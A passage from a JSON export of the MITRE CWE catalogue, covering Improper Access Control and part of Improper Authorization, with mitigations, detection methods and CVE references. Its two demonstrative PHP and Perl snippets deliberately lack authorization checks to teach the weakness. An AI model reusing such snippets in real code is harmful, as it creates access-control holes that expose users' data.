own\\")return","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":["This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes.","This function remedies the problem by checking the owner of the process before killing it:"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0178","Description":"Program does not verify the owner of a UNIX socket that is used for sending a password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0178"},{"Reference":"CVE-2004-2012","Description":"Owner of special device not checked, allowing root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2012"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unverified Ownership"}},"Notes":{"Note":{"#text":"This overlaps insufficient comparison, verification errors, permissions, and privileges.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"284":{"attr":{"@_ID":"284","@_Name":"Improper Access Control","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.","Extended_Description":{"xhtml:p":["Access control involves the use of several protection mechanisms such as:","When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.","There are two distinct behaviors that can introduce access control weaknesses:"],"xhtml:ul":{"xhtml:li":["Authentication (proving the identity of an actor)","Authorization (ensuring that a given actor can access a resource), and","Accountability (tracking of activities that were performed)"]},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator.","Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies."]}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Authorization","Description":"The terms \\"access control\\" and \\"authorization\\" are often used interchangeably, although many people have distinct definitions. The CWE usage of \\"access control\\" is intended as a general term for the various mechanisms that restrict which users can access which resources, and \\"authorization\\" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-4624","Description":"Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4624"}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Access Control List (ACL) errors"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":2,"Entry_Name":"Insufficient Authorization"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"19"}},{"attr":{"@_CAPEC_ID":"441"}},{"attr":{"@_CAPEC_ID":"478"}},{"attr":{"@_CAPEC_ID":"479"}},{"attr":{"@_CAPEC_ID":"502"}},{"attr":{"@_CAPEC_ID":"503"}},{"attr":{"@_CAPEC_ID":"536"}},{"attr":{"@_CAPEC_ID":"546"}},{"attr":{"@_CAPEC_ID":"550"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"552"}},{"attr":{"@_CAPEC_ID":"556"}},{"attr":{"@_CAPEC_ID":"558"}},{"attr":{"@_CAPEC_ID":"562"}},{"attr":{"@_CAPEC_ID":"563"}},{"attr":{"@_CAPEC_ID":"564"}},{"attr":{"@_CAPEC_ID":"578"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, "Determining Appropriate Access Control" Page 171"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 17: Failure to Protect Stored Data." Page 253"}}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This entry needs more work. Possible sub-categories include:","xhtml:ul":{"xhtml:li":["Trusted group includes undesired entities (partially covered by CWE-286)","Group can perform undesired actions","ACL parse error does not fail closed"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-24","Modification_Importance":"Critical","Modification_Comment":"Changed name and description; clarified difference between \\"access control\\" and \\"authorization.\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Access Control Issues","attr":{"@_Date":"2008-09-09"}},{"#text":"Access Control (Authorization) Issues","attr":{"@_Date":"2011-03-29"}}]}},"285":{"attr":{"@_ID":"285","@_Name":"Improper Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Architecture and Design","Note":{"xhtml:p":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic"},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle->prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement->execute(array(\':name\' => $name));return $preparedStatement->fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q->param(\'username\'), $q->param(\'password\'))) {}my $id = $q->param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message->{from}) . \\"<br>\\\\n\\";print \\"Subject: \\" . encodeHTML($Message->{subject}) . \\"\\\\n\\";print \\"<hr>\\\\n\\";print \\"Body: \\" . encodeHTML($Message->{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing Access Control"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"402"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"5"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"647"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}},{"attr":{"@_CAPEC_ID":"87"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, "Authorization" Page 114; Chapter 6, "Determining Appropriate Access Control" Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Authorization", Page 39"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "ACL Inheritance", Page 649"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content 